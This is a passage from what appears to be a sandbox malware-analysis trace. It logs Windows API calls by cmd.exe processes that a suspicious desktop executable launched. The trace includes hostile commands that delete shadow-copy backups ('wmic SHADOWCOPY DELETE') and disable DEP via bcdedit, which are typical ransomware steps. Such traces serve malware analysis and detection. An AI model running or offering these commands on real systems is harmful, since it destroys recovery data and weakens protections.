_String2="KEYS") returned -9 [0099.484] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0099.484] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0099.484] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0099.484] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0099.484] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0099.484] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0099.484] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0099.484] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0099.484] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0099.484] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0099.484] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0099.485] GetProcessHeap () returned 0xe0000 [0099.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x218) returned 0xfb890 [0099.485] GetProcessHeap () returned 0xe0000 [0099.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x62) returned 0xfbab0 [0099.485] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0099.485] GetProcessHeap () returned 0xe0000 [0099.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x420) returned 0xfbb20 [0099.485] SetErrorMode (uMode=0x0) returned 0x0 [0099.485] SetErrorMode (uMode=0x1) returned 0x0 [0099.485] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xfbb30, lpFilePart=0x31ef10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31ef10*="Desktop") returned 0x25 [0099.485] SetErrorMode (uMode=0x0) returned 0x1 [0099.485] GetProcessHeap () returned 0xe0000 [0099.485] RtlReAllocateHeap (Heap=0xe0000, Flags=0x0, Ptr=0xfbb20, Size=0x74) returned 0xfbb20 [0099.485] GetProcessHeap () returned 0xe0000 [0099.485] RtlSizeHeap (HeapHandle=0xe0000, Flags=0x0, MemoryPointer=0xfbb20) returned 0x74 [0099.485] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.485] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.486] GetProcessHeap () returned 0xe0000 [0099.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x128) returned 0xfbbb0 [0099.486] GetProcessHeap () returned 0xe0000 [0099.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x240) returned 0xfbce0 [0099.491] GetProcessHeap () returned 0xe0000 [0099.491] RtlReAllocateHeap (Heap=0xe0000, Flags=0x0, Ptr=0xfbce0, Size=0x12a) returned 0xfbce0 [0099.491] GetProcessHeap () returned 0xe0000 [0099.491] RtlSizeHeap (HeapHandle=0xe0000, Flags=0x0, MemoryPointer=0xfbce0) returned 0x12a [0099.491] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.491] GetProcessHeap () returned 0xe0000 [0099.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xe8) returned 0xfbe20 [0099.491] GetProcessHeap () returned 0xe0000 [0099.491] RtlReAllocateHeap (Heap=0xe0000, Flags=0x0, Ptr=0xfbe20, Size=0x7e) returned 0xfbe20 [0099.491] GetProcessHeap () returned 0xe0000 [0099.491] RtlSizeHeap (HeapHandle=0xe0000, Flags=0x0, MemoryPointer=0xfbe20) returned 0x7e [0099.492] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.492] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x31ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ec80) returned 0xffffffffffffffff [0099.492] GetLastError () returned 0x2 [0099.492] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x31ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ec80) returned 0xffffffffffffffff [0099.492] GetLastError () returned 0x2 [0099.492] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x31ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ec80) returned 0xffffffffffffffff [0099.492] GetLastError () returned 0x2 [0099.492] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.492] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x31ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ec80) returned 0xf9a60 [0099.492] GetProcessHeap () returned 0xe0000 [0099.492] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x28) returned 0xf4620 [0099.492] FindClose (in: hFindFile=0xf9a60 | out: hFindFile=0xf9a60) returned 1 [0099.492] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0099.492] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0099.492] GetConsoleTitleW (in: lpConsoleTitle=0x31f1d0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.493] InitializeProcThreadAttributeList (in: lpAttributeList=0x31ef88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x31ef48 | out: lpAttributeList=0x31ef88, lpSize=0x31ef48) returned 1 [0099.493] UpdateProcThreadAttribute (in: lpAttributeList=0x31ef88, dwFlags=0x0, Attribute=0x60001, lpValue=0x31ef38, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x31ef88, lpPreviousValue=0x0) returned 1 [0099.493] GetStartupInfoW (in: lpStartupInfo=0x31f0a0 | out: lpStartupInfo=0x31f0a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0099.493] GetProcessHeap () returned 0xe0000 [0099.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xf4650 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0099.493] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.494] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.494] GetProcessHeap () returned 0xe0000 [0099.494] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf4650 | out: hHeap=0xe0000) returned 1 [0099.494] GetProcessHeap () returned 0xe0000 [0099.494] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x12) returned 0xf8370 [0099.494] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0099.495] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {current} nx AlwaysOff", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x31efc0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit.exe /set {current} nx AlwaysOff", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31ef70 | out: lpCommandLine="bcdedit.exe /set {current} nx AlwaysOff", lpProcessInformation=0x31ef70*(hProcess=0x54, hThread=0x50, dwProcessId=0x8a4, dwThreadId=0x8ac)) returned 1 [0099.498] CloseHandle (hObject=0x50) returned 1 [0099.498] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0099.498] GetProcessHeap () returned 0xe0000 [0099.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfd730 | out: hHeap=0xe0000) returned 1 [0099.498] GetEnvironmentStringsW () returned 0xfcc40* [0099.498] GetProcessHeap () returned 0xe0000 [0099.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xae8) returned 0xfd730 [0099.498] FreeEnvironmentStringsW (penv=0xfcc40) returned 1 [0099.498] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0100.552] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x31eeb8 | out: lpExitCode=0x31eeb8*=0x0) returned 1 [0100.552] CloseHandle (hObject=0x54) returned 1 [0100.552] _vsnwprintf (in: _Buffer=0x31f128, _BufferCount=0x13, _Format="%08X", _ArgList=0x31eec8 | out: _Buffer="00000000") returned 8 [0100.552] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0100.552] GetProcessHeap () returned 0xe0000 [0100.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfd730 | out: hHeap=0xe0000) returned 1 [0100.552] GetEnvironmentStringsW () returned 0xfcc40* [0100.552] GetProcessHeap () returned 0xe0000 [0100.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xb0e) returned 0xfed40 [0100.552] FreeEnvironmentStringsW (penv=0xfcc40) returned 1 [0100.552] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.552] GetProcessHeap () returned 0xe0000 [0100.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfed40 | out: hHeap=0xe0000) returned 1 [0100.552] GetEnvironmentStringsW () returned 0xfcc40* [0100.552] GetProcessHeap () returned 0xe0000 [0100.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xb0e) returned 0xfed40 [0100.552] FreeEnvironmentStringsW (penv=0xfcc40) returned 1 [0100.552] GetProcessHeap () returned 0xe0000 [0100.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf8370 | out: hHeap=0xe0000) returned 1 [0100.552] DeleteProcThreadAttributeList (in: lpAttributeList=0x31ef88 | out: lpAttributeList=0x31ef88) [0100.552] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.552] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.553] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0100.553] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.553] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0100.553] SetConsoleInputExeNameW () returned 0x1 [0100.553] GetConsoleOutputCP () returned 0x1b5 [0100.553] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0100.553] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.553] exit (_Code=0) Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6e7e0000" os_pid = "0x894" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9b8" cmd_line = "/C wmic SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0x88c [0099.067] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe90 | out: lpSystemTimeAsFileTime=0x26fe90*(dwLowDateTime=0x8f1467b0, dwHighDateTime=0x1d5956e)) [0099.067] GetCurrentProcessId () returned 0x894 [0099.067] GetCurrentThreadId () returned 0x88c [0099.067] GetTickCount () returned 0x1152e61 [0099.067] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe98 | out: lpPerformanceCount=0x26fe98*=21935250228) returned 1 [0099.069] GetModuleHandleW (lpModuleName=0x0) returned 0x4acb0000 [0099.069] __set_app_type (_Type=0x1) [0099.069] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4acd7810) returned 0x0 [0099.069] __getmainargs (in: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610, _DoWildCard=0, _StartInfo=0x4acde0f4 | out: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610) returned 0 [0099.069] GetCurrentThreadId () returned 0x88c [0099.069] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x88c) returned 0x3c [0099.070] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.070] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0099.070] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.070] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.070] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fe28 | out: phkResult=0x26fe28*=0x0) returned 0x2 [0099.070] VirtualQuery (in: lpAddress=0x26fe10, lpBuffer=0x26fd90, dwLength=0x30 | out: lpBuffer=0x26fd90*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.070] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd90, dwLength=0x30 | out: lpBuffer=0x26fd90*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.070] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd90, dwLength=0x30 | out: lpBuffer=0x26fd90*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.070] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26fd90, dwLength=0x30 | out: lpBuffer=0x26fd90*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.070] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd90, dwLength=0x30 | out: lpBuffer=0x26fd90*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0099.070] GetConsoleOutputCP () returned 0x1b5 [0099.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.071] SetConsoleCtrlHandler (HandlerRoutine=0x4acd3184, Add=1) returned 1 [0099.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0099.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.287] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0099.287] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.287] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0099.287] GetEnvironmentStringsW () returned 0x358a60* [0099.287] GetProcessHeap () returned 0x340000 [0099.287] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa7c) returned 0x3594f0 [0099.287] FreeEnvironmentStringsW (penv=0x358a60) returned 1 [0099.287] GetProcessHeap () returned 0x340000 [0099.287] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x8) returned 0x3588e0 [0099.287] GetEnvironmentStringsW () returned 0x358a60* [0099.288] GetProcessHeap () returned 0x340000 [0099.288] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa7c) returned 0x359f80 [0099.288] FreeEnvironmentStringsW (penv=0x358a60) returned 1 [0099.288] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ece8 | out: phkResult=0x26ece8*=0x44) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x0, lpData=0x26ed00*=0x18, lpcbData=0x26ece4*=0x1000) returned 0x2 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x4, lpData=0x26ed00*=0x1, lpcbData=0x26ece4*=0x4) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x0, lpData=0x26ed00*=0x1, lpcbData=0x26ece4*=0x1000) returned 0x2 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x4, lpData=0x26ed00*=0x0, lpcbData=0x26ece4*=0x4) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x4, lpData=0x26ed00*=0x40, lpcbData=0x26ece4*=0x4) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x4, lpData=0x26ed00*=0x40, lpcbData=0x26ece4*=0x4) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x0, lpData=0x26ed00*=0x40, lpcbData=0x26ece4*=0x1000) returned 0x2 [0099.288] RegCloseKey (hKey=0x44) returned 0x0 [0099.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ece8 | out: phkResult=0x26ece8*=0x44) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x0, lpData=0x26ed00*=0x40, lpcbData=0x26ece4*=0x1000) returned 0x2 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x4, lpData=0x26ed00*=0x1, lpcbData=0x26ece4*=0x4) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x0, lpData=0x26ed00*=0x1, lpcbData=0x26ece4*=0x1000) returned 0x2 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x4, lpData=0x26ed00*=0x0, lpcbData=0x26ece4*=0x4) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x4, lpData=0x26ed00*=0x9, lpcbData=0x26ece4*=0x4) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x4, lpData=0x26ed00*=0x9, lpcbData=0x26ece4*=0x4) returned 0x0 [0099.288] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ece0, lpData=0x26ed00, lpcbData=0x26ece4*=0x1000 | out: lpType=0x26ece0*=0x0, lpData=0x26ed00*=0x9, lpcbData=0x26ece4*=0x1000) returned 0x2 [0099.289] RegCloseKey (hKey=0x44) returned 0x0 [0099.289] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc41ad7 [0099.289] srand (_Seed=0x5dc41ad7) [0099.289] GetCommandLineW () returned="/C wmic SHADOWCOPY DELETE" [0099.289] GetCommandLineW () returned="/C wmic SHADOWCOPY DELETE" [0099.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.289] GetProcessHeap () returned 0x340000 [0099.289] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x218) returned 0x35aa10 [0099.289] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.289] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.289] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.289] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.289] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0099.289] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0099.289] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0099.289] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0099.289] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0099.289] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0099.289] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0099.289] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0099.290] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0099.290] GetProcessHeap () returned 0x340000 [0099.290] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3594f0 | out: hHeap=0x340000) returned 1 [0099.290] GetEnvironmentStringsW () returned 0x358a60* [0099.290] GetProcessHeap () returned 0x340000 [0099.290] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa94) returned 0x35ac30 [0099.290] FreeEnvironmentStringsW (penv=0x358a60) returned 1 [0099.290] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.290] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.290] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.290] _wcsicmp 